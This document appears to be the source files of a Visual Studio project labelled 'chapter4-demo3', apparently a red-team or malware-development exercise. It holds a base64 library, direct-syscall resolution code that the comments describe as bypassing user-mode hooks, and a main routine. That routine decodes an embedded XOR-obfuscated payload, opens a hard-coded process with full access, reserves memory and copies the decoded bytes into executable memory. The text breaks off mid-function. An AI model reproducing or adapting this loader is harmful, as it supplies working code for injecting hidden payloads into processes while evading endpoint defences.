"#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0\r\nDebug|Win32|E:\\7bits_demo\\demo1\\demo1\\|\r\n" }, { "path": "chapter4-demo3/demo1/Header.h", "content": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };\r\n#include \r\n\r\nconst std::vector VC_PREF_BASES{ (void*)0x00000000DDDD0000,\r\n (void*)0x0000000010000000,\r\n (void*)0x0000000021000000,\r\n (void*)0x0000000032000000,\r\n (void*)0x0000000043000000,\r\n (void*)0x0000000050000000,\r\n (void*)0x0000000041000000,\r\n (void*)0x0000000042000000,\r\n (void*)0x0000000040000000,\r\n (void*)0x0000000022000000 };" }, { "path": "chapter4-demo3/demo1/base64.cpp", "content": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n Version: 2.rc.08 (release candidate)\n\n Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger\n\n This source code is provided 'as-is', without any express or implied\n warranty. In no event will the author be held liable for any damages\n arising from the use of this software.\n\n Permission is granted to anyone to use this software for any purpose,\n including commercial applications, and to alter it and redistribute it\n freely, subject to the following restrictions:\n\n 1. The origin of this source code must not be misrepresented; you must not\n\t claim that you wrote the original source code. If you use this source code\n\t in a product, an acknowledgment in the product documentation would be\n\t appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n\t misrepresented as being the original source code.\n\n 3. This notice may not be removed or altered from any source distribution.\n\n Ren?Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include \n#include \n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate \nstatic std::string encode_with_line_breaks(String s) {\n\treturn insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate \nstatic std::string encode_pem(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate \nstatic std::string decode(String encoded_string, bool remove_linebreaks) {\n\t//\n\t// decode(? is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif // __cplusplus >= 201703L\n" }, { "path": "chapter4-demo3/demo1/base64.h", "content": "//\n// base64 encoding and decoding with C++.\n// Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n\n#include \n\n#if __cplusplus >= 201703L\n#include \n#endif // __cplusplus >= 201703L\n\nstd::string base64_encode(std::string const& s, bool url = false);\nstd::string base64_encode_pem(std::string const& s);\nstd::string base64_encode_mime(std::string const& s);\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\nstd::string base64_encode(std::string_view s, bool url = false);\nstd::string base64_encode_pem(std::string_view s);\nstd::string base64_encode_mime(std::string_view s);\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\n#endif // __cplusplus >= 201703L\n\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\n" }, { "path": "chapter4-demo3/demo1/demo1.cpp", "content": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include \r\n#include \r\n#include \"header.h\"\r\n#include \"base64.h\"\r\n#include \"nt.h\"\r\nusing namespace std;\r\n\r\nunsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)\r\n{\r\n\tDWORD szRead{ 0 };\r\n\r\n\tHANDLE hFile = CreateFileA(\r\n\t\tfnamSc,\r\n\t\tGENERIC_READ,\r\n\t\tNULL,\r\n\t\tNULL,\r\n\t\tOPEN_EXISTING,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tNULL\r\n\t);\r\n\r\n\tif (INVALID_HANDLE_VALUE == hFile)\r\n\t\treturn nullptr;\r\n\r\n\tSIZE_T szFile = GetFileSize(hFile, NULL);\r\n\t*szSc = szFile;\r\n\r\n\tunsigned char* raw = new unsigned char[szFile];\r\n\tunsigned char* sc = new unsigned char[szFile];\r\n\r\n\tif (!ReadFile(hFile, raw, szFile, &szRead, NULL))\r\n\t\treturn nullptr;\r\n\r\n\tint i;\r\n\r\n\tfor (i = 0; i < szRead; i++) {\r\n\t\tsc[i] = raw[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\treturn sc;\r\n}\r\n\r\n\r\nstd::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)\r\n\r\n{\r\n\tstd::string str = inStr;\r\n\tstd::string::size_type stStart = 0;\r\n\tstd::string::iterator iter = str.begin();\r\n\twhile (iter != str.end())\r\n\r\n\t{\r\n\t\tstd::string::size_type st = str.find(pSrc, stStart);\r\n\r\n\t\tif (st == str.npos)\r\n\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\titer = iter + st - stStart;\r\n\t\tstr.replace(iter, iter + strlen(pSrc), pReplace);\r\n\t\titer = iter + strlen(pReplace);\r\n\t\tstStart = st + strlen(pReplace);\r\n\t}\r\n\r\n\treturn str;\r\n\r\n}\r\n\r\nLPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)\r\n{\r\n\tMEMORY_BASIC_INFORMATION mbi;\r\n\r\n\tfor (auto base : VC_PREF_BASES) {\r\n\t\tVirtualQueryEx(\r\n\t\t\thProc,\r\n\t\t\tbase,\r\n\t\t\t&mbi,\r\n\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t);\r\n\r\n\t\tif (MEM_FREE == mbi.State) {\r\n\t\t\tuint64_t i;\r\n\t\t\tfor (i = 0; i < cVmResv; ++i) {\r\n\t\t\t\tLPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));\r\n\t\t\t\tVirtualQueryEx(\r\n\t\t\t\t\thProc,\r\n\t\t\t\t\tcurrentBase,\r\n\t\t\t\t\t&mbi,\r\n\t\t\t\t\tsizeof(MEMORY_BASIC_INFORMATION)\r\n\t\t\t\t);\r\n\t\t\t\tif (MEM_FREE != mbi.State)\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif (i == cVmResv) {\r\n\t\t\t\t// found suitable base\r\n\t\t\t\treturn base;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn nullptr;\r\n}\r\n\r\n#ifdef _M_IX86\r\n\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {\r\n\treturn (PVOID)__readfsdword(0xC0);\r\n}\r\n\r\n__declspec(naked) BOOL local_is_wow64(void)\r\n{\r\n\t__asm {\r\n\t\tmov eax, fs: [0xc0]\r\n\t\ttest eax, eax\r\n\t\tjne wow64\r\n\t\tmov eax, 0\r\n\t\tret\r\n\t\twow64 :\r\n\t\tmov eax, 1\r\n\t\t\tret\r\n\t}\r\n}\r\n\r\n\r\n#endif\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams\r\n\r\nSW3_SYSCALL_LIST SW3_SyscallList;\r\n\r\n// SEARCH_AND_REPLACE\r\n#ifdef SEARCH_AND_REPLACE\r\n// THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release\r\nEXTERN void SearchAndReplace(unsigned char[], unsigned char[]);\r\n#endif\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName)\r\n{\r\n\tDWORD i = 0;\r\n\tDWORD Hash = SW3_SEED;\r\n\r\n\twhile (FunctionName[i])\r\n\t{\r\n\t\tWORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);\r\n\t\tHash ^= PartialName + SW3_ROR8(Hash);\r\n\t}\r\n\r\n\treturn Hash;\r\n}\r\n\r\n#ifndef JUMPER\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n\treturn NULL;\r\n}\r\n#else\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n\tDWORD searchLimit = 512;\r\n\tPVOID SyscallAddress;\r\n\r\n#ifdef _WIN64\r\n\t// If the process is 64-bit on a 64-bit OS, we need to search for syscall\r\n\tBYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };\r\n\tULONG distance_to_syscall = 0x12;\r\n#else\r\n\t// If the process is 32-bit on a 32-bit OS, we need to search for sysenter\r\n\tBYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };\r\n\tULONG distance_to_syscall = 0x0f;\r\n#endif\r\n\r\n#ifdef _M_IX86\r\n\t// If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved\r\n\tif (local_is_wow64())\r\n\t{\r\n#ifdef DEBUG\r\n\t\tprintf(\"[+] Running 32-bit app on x64 (WOW64)\\n\");\r\n#endif\r\n\t\treturn NULL;\r\n\t}\r\n#endif\r\n\r\n\t// we don't really care if there is a 'jmp' between\r\n\t// NtApiAddress and the 'syscall; ret' instructions\r\n\tSyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);\r\n\r\n\tif (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n\t{\r\n\t\t// we can use the original code for this system call :)\r\n#if defined(DEBUG)\r\n\t\tprintf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n\t\treturn SyscallAddress;\r\n\t}\r\n\r\n\t// the 'syscall; ret' intructions have not been found,\r\n\t// we will try to use one near it, similarly to HalosGate\r\n\r\n\tfor (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)\r\n\t{\r\n\t\t// let's try with an Nt* API below our syscall\r\n\t\tSyscallAddress = SW3_RVA2VA(\r\n\t\t\tPVOID,\r\n\t\t\tNtApiAddress,\r\n\t\t\tdistance_to_syscall + num_jumps * 0x20);\r\n\t\tif (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n\t\t{\r\n#if defined(DEBUG)\r\n\t\t\tprintf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n\t\t\treturn SyscallAddress;\r\n\t\t}\r\n\r\n\t\t// let's try with an Nt* API above our syscall\r\n\t\tSyscallAddress = SW3_RVA2VA(\r\n\t\t\tPVOID,\r\n\t\t\tNtApiAddress,\r\n\t\t\tdistance_to_syscall - num_jumps * 0x20);\r\n\t\tif (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n\t\t{\r\n#if defined(DEBUG)\r\n\t\t\tprintf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n\t\t\treturn SyscallAddress;\r\n\t\t}\r\n\t}\r\n\r\n#ifdef DEBUG\r\n\tprintf(\"Syscall Opcodes not found!\\n\");\r\n#endif\r\n\r\n\treturn NULL;\r\n}\r\n#endif\r\n\r\n\r\nBOOL SW3_PopulateSyscallList()\r\n{\r\n\t// Return early if the list is already populated.\r\n\tif (SW3_SyscallList.Count) return TRUE;\r\n\r\n#ifdef _WIN64\r\n\tPSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);\r\n#else\r\n\tPSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);\r\n#endif\r\n\tPSW3_PEB_LDR_DATA Ldr = Peb->Ldr;\r\n\tPIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;\r\n\tPVOID DllBase = NULL;\r\n\r\n\t// Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second\r\n\t// in the list, so it's safer to loop through the full list and find it.\r\n\tPSW3_LDR_DATA_TABLE_ENTRY LdrEntry;\r\n\tfor (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])\r\n\t{\r\n\t\tDllBase = LdrEntry->DllBase;\r\n\t\tPIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;\r\n\t\tPIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);\r\n\t\tPIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;\r\n\t\tDWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\r\n\t\tif (VirtualAddress == 0) continue;\r\n\r\n\t\tExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);\r\n\r\n\t\t// If this is NTDLL.dll, exit loop.\r\n\t\tPCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);\r\n\r\n\t\tif ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;\r\n\t\tif ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;\r\n\t}\r\n\r\n\tif (!ExportDirectory) return FALSE;\r\n\r\n\tDWORD NumberOfNames = ExportDirectory->NumberOfNames;\r\n\tPDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);\r\n\tPDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);\r\n\tPWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);\r\n\r\n\t// Populate SW3_SyscallList with unsorted Zw* entries.\r\n\tDWORD i = 0;\r\n\tPSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;\r\n\tdo\r\n\t{\r\n\t\tPCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);\r\n\r\n\t\t// Is this a system call?\r\n\t\tif (*(USHORT*)FunctionName == 0x775a)\r\n\t\t{\r\n\t\t\tEntries[i].Hash = SW3_HashSyscall(FunctionName);\r\n\t\t\tEntries[i].Address = Functions[Ordinals[NumberOfNames - 1]];\r\n\t\t\tEntries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));\r\n\r\n\t\t\ti++;\r\n\t\t\tif (i == SW3_MAX_ENTRIES) break;\r\n\t\t}\r\n\t} while (--NumberOfNames);\r\n\r\n\t// Save total number of system calls found.\r\n\tSW3_SyscallList.Count = i;\r\n\r\n\t// Sort the list by address in ascending order.\r\n\tfor (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)\r\n\t{\r\n\t\tfor (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)\r\n\t\t{\r\n\t\t\tif (Entries[j].Address > Entries[j + 1].Address)\r\n\t\t\t{\r\n\t\t\t\t// Swap entries.\r\n\t\t\t\tSW3_SYSCALL_ENTRY TempEntry;\r\n\r\n\t\t\t\tTempEntry.Hash = Entries[j].Hash;\r\n\t\t\t\tTempEntry.Address = Entries[j].Address;\r\n\t\t\t\tTempEntry.SyscallAddress = Entries[j].SyscallAddress;\r\n\r\n\t\t\t\tEntries[j].Hash = Entries[j + 1].Hash;\r\n\t\t\t\tEntries[j].Address = Entries[j + 1].Address;\r\n\t\t\t\tEntries[j].SyscallAddress = Entries[j + 1].SyscallAddress;\r\n\r\n\t\t\t\tEntries[j + 1].Hash = TempEntry.Hash;\r\n\t\t\t\tEntries[j + 1].Address = TempEntry.Address;\r\n\t\t\t\tEntries[j + 1].SyscallAddress = TempEntry.SyscallAddress;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn TRUE;\r\n}\r\n\r\nEXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)\r\n{\r\n\t// Ensure SW3_SyscallList is populated.\r\n\tif (!SW3_PopulateSyscallList()) return -1;\r\n\r\n\tfor (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n\t{\r\n\t\tif (FunctionHash == SW3_SyscallList.Entries[i].Hash)\r\n\t\t{\r\n\t\t\treturn i;\r\n\t\t}\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)\r\n{\r\n\t// Ensure SW3_SyscallList is populated.\r\n\tif (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n\tfor (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n\t{\r\n\t\tif (FunctionHash == SW3_SyscallList.Entries[i].Hash)\r\n\t\t{\r\n\t\t\treturn SW3_SyscallList.Entries[i].SyscallAddress;\r\n\t\t}\r\n\t}\r\n\r\n\treturn NULL;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)\r\n{\r\n\t// Ensure SW3_SyscallList is populated.\r\n\tif (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n\tDWORD index = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n\r\n\twhile (FunctionHash == SW3_SyscallList.Entries[index].Hash) {\r\n\t\t// Spoofing the syscall return address\r\n\t\tindex = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n\t}\r\n\treturn SW3_SyscallList.Entries[index].SyscallAddress;\r\n}\r\n\r\n\r\n\r\nint main()\r\n{\r\n\tbool all_tests_passed = false;\r\n\r\n\tstd::string rest2_reference = \"9ECL7PjgwAgICElZSVhaWV5AOdptQINaaECDWhBAg1ooQIN6WEAHv0JCRTnBQDnIpDRpdAokKEnJwQVJCcnq5VpJWUCDWiiDSjRACdhuiXAQAwp9eoOIgAgICECNyHxvQAnYWINAEEyDSChBCdjrXkD3wUmDPIBACd5FOcFAOcikScnBBUkJyTDofflEC0QsAE0x2X3QUEyDSCxBCdhuSYMEQEyDSBRBCdhJgwyAQAnYSVBJUFZRUklQSVFJUkCL5ChJWvfoUElRUkCDGuFH9/f3VWIIQbZ/YWZhZm18CEleQYHuRIH5SbJEfy4P991AOcFAOdpFOchFOcFJWElYSbIyXnGv993je1JAgclJsFgICAhFOcFJWUlZYgtJWUmyX4GXzvfd41FTQIHJQDnaQYHQRTnBWmAICkiMWlpJsuNdJjP33UCBzkCLy1hiAldAgflAgdJBz8j39/f3RTnBWlpJsiUOEHP33Y3IB42VCQgIQPfHB4yECQgI49vh7AkICOCq9/f3J0V8UEwIQShDvCCeEfnGqz4QOUCZb1k9zZRfrP2kaoTlwQZQ+aY4tgZwQlaNp0lYfmGOcGoGYzblJRLD9V4TH2y6c1s4iOAMlePMttdpgghde216JUlvbWZ8MihFZ3JhZGRpJzwmOCgga2dleGl8YWpkbTMoRVtBTSg/JjgzKF9hZmxnf3soRlwoPSY5IQUCCM1l6QoDmhAeJZoutN1CPkoMbBYRT4p4JodhVtQQ/QXiL7U61RfcwKRjFq95GITSknVDXEYydGh4NjiMRT6a43pevMz6zCoiQMDcYy/1jHjhWWvhVp/6TPSIiL5RP8LaSwpz++6FswyGtYnKUJ+da0rRw4YW4GE1isJ9yBukKGBzCetRpZrAZtf8AZPUpuLRg9gLYdXFeifw5yhKxN4jy6BQV14m/VHXb2WO3XrQXc7c0CxfgIM1rYMHGVMH6y9uyurrF7uMzIg+sptJ4pFTYuzDslBKxx4+qcw2ikCPTsks2vAe8rGqLYAwlP4+eRcISbb4vape991AOcGyCAhICEmwCBgICEmxSAgICEmyUKxb7ffdQJtbW0CB70CB+UCB0kmwCCgICEGB8UmyGp6B6vfdQIvMKI3IfL5ugw9ACcuNyH3fUFBQQA0ICAgIWMvgl/X39zkxOiY5PjAmOCY5OzkIWQG3ZQ@@\";\r\n\r\n\tstd::string rest3_reference = replace(rest2_reference, \"@@\", \"==\");\r\n\r\n\tstd::string rest2_decoded = base64_decode(rest3_reference);\r\n\r\n\tconst char* S = rest2_decoded.c_str();\r\n\r\n\r\n\r\n\r\n\tHANDLE hProc = OpenProcess(\r\n\t\tPROCESS_ALL_ACCESS,\r\n\t\tFALSE,\r\n\t\t8696\r\n\t);\r\n\r\n\tSYSTEM_INFO sys_inf;\r\n\tGetSystemInfo(&sys_inf);\r\n\r\n\tDWORD page_size{ sys_inf.dwPageSize };\r\n\tDWORD alloc_gran{ sys_inf.dwAllocationGranularity };\r\n\r\n\tSIZE_T szVmResv{ alloc_gran };\r\n\tSIZE_T szVmCmm{ page_size };\r\n\tDWORD cVmResv = (rest2_decoded.length() / szVmResv) + 1;\r\n\tDWORD cVmCmm = szVmResv / szVmCmm;\r\n\r\n\tLPVOID vmBaseAddress = GetSuitableBaseAddress(\r\n\t\thProc,\r\n\t\tszVmCmm,\r\n\t\tszVmResv,\r\n\t\tcVmResv\r\n\t);\r\n\tLPVOID currentVmBase{ vmBaseAddress };\r\n\tNTSTATUS status{ 0 };\r\n\tvector vcVmResv;\r\n\r\n\t//alloc memeory\r\n\tfor (int i = 1; i <= cVmResv; ++i)\r\n\t{\r\n\r\n\t\tstatus = BNtAVM(\r\n\t\t\thProc,\r\n\t\t\t¤tVmBase,\r\n\t\t\tNULL,\r\n\t\t\t&szVmResv,\r\n\t\t\tMEM_RESERVE,\r\n\t\t\tPAGE_NOACCESS\r\n\t\t);\r\n\t\tif (STATUS_SUCCESS == status) {\r\n\t\t\tvcVmResv.push_back(currentVmBase);\r\n\t\t}\r\n\t\telse {\r\n\r\n\t\t\tstd::cout << \"AVM error\";\r\n\t\t}\r\n\t\tcurrentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);\r\n\t}\r\n\r\n\tDWORD offsetSc{ 0 };\r\n\tDWORD oldProt;\r\n\r\n\tdouble prcDone{ 0 };\r\n\r\n\tDWORD cmm_i;\r\n\tfor (int i = 0; i < cVmResv; ++i)\r\n\t{\r\n\t\tunsigned char* sc = new unsigned char[szVmCmm];\r\n\t\tfor (int j = 0; j < szVmCmm; j++) {\r\n\t\t\t//cout << szVmCmm * i + j << endl;\r\n\t\t\tsc[j] = S[szVmCmm * i + j] ^ XOR_KEY;\r\n\t\t}\r\n\r\n\t\tvoid* exec = VirtualAlloc(0, cVmResv, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\tmemcpy(exec, sc, rest2_decoded.length());\r\n\r\n\t\t//((void(*)())exec)();\r\n\r\n\t\t/*\r\n\t\tHANDLE hThread = 